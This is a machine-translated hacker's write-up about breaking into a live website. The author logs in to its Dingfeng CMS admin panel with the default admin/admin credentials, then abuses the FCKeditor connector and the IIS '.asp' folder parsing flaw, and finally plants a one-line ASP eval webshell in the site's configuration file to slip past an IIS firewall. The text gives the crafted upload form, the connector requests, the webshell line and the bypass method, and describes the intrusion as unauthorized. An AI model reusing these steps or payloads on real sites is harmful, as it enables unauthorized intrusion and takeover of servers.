Configure file plug-in to bypass the IIS Firewall

One day the Group sent a background http://www.bkjia.com/manage/Login. asp, default management account, let help upload shell, out of curiosity, open a look
There is a data backup page, but it is replaced by a txt black page by a certain installation B.

Data backup page forced male deletion, there is upload http://www.bkjia.com/upload. asp, but the upload Trojan POST is intercepted

This station is not easy to handle. Let's check it out.

I found several sites and injected a lot, but I was charged for several MD5 cracking attacks. I had no money to crack the problem.
For the sake of simplicity, we mainly look for the default password management, there are also a few, but some can not be used in the background, some upload prompt POST packet interception

Finally found a station http://www.bkjia.com/
Background http://www.xxxxx.com/manage/login.asp
Dingfeng CMS (dfcms), admin + admin successfully logged on

Looking at the background, there are many functions, such as uploading and Database Backup (but they are automatic backups and cannot be customized paths), and basic website information management (you can consider inserting Trojans here ), there is also the Fckeditor Editor, which should be highly likely to break through.
However, normal uploads are estimated to be intercepted, and database backup cannot be used.
The configuration file may be used again after being inserted. If the insertion fails, or the insertion is successful but blocked, the entire site may be suspended.
If Fckeditor is available, try it first.
First browse the Media Directory
Http://www.xxxx.com/manage/Include/fckeditor/editor/filemanager/connectors/asp/connector. asp? Command = GetFoldersAndFiles & Type = Media & CurrentFolder = % 2F

No problem. You can browse
Access http://www.xxxx.com/manage/Inclu... Nd = CreateFolder &; Type = Media & CurrentFolder = % 2Fa. asp & NewFolderName = aaaa & uuid = 1279789845662
Create a. asp folder
Go to the Media directory and create the. asp folder.

Final Construction of the upload form


<Form id = "frmUpload" enctype = "multipart/form-data" action = "http://www.xxxx.com/manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp? Command = FileUpload & Type = Media & CurrentFolder = % 2Fa. asp "method =" post "> Upload a new file: <br> <input type = "file" name = "NewFile" size = "50"> <br> <input id = "btnUpload" type = "submit" value = "Upload "> </form>
 
Upload a sentence to get shell
 
Http://www.xxxxx.com/uploadfiles/media/a.asp/abc.jpg
 
 

But there was a problem with the access, and the damn prompt came out again.

The current webpage is temporarily inaccessible (blocked by the firewall)

No way. What should I do? I asked people in the group, no one was looking at me.
Baidu learned that it was originally the IIS firewall of zhichuang. It seems that dish B still needs to strengthen its defense against such bypassing measures.

Find an article about how to break through the smart Innovation
When the IIS parsing vulnerability is exploited, it is regarded as a malicious script and thus caused by the wall.
Access to such a horse will be blocked: upload/1.asp/ 2_asp; jpg
Access to such a horse will not be blocked: upload/2.asp;.jpg
In this way, if the secondary upload of fckeditor can be used, it will be able to break through. Unfortunately, the secondary upload is fixed.

The last trick is to plug in the configuration file.
Since the intercepted IIS resolution is described above, it indicates that the interception is not a Trojan, or a distorted sentence may be bypassed.
I decided to use this sentence.


<% BBBB = request ("aaaa") %> <% eval (BBBB) %>
 
Add after the company address
 
 
"%> <% BBBB = request (" aaaa ") %> <% eval (BBBB) %> <%'

Save. No problem. No
The configuration file address at the bottom of the page is provided./include/vars. asp
Direct access is blank and no error is reported or blocked
Connect with a kitchen knife. Success !!!

Upload a Trojan and try it. You can upload it successfully and access it.
In this case, it seems that zichuang only blocks IIS parsing and cannot identify whether the script is a trojan.
In addition, it also filters uploaded POST data packets. Here, a modified sentence is inserted through the configuration file to successfully Bypass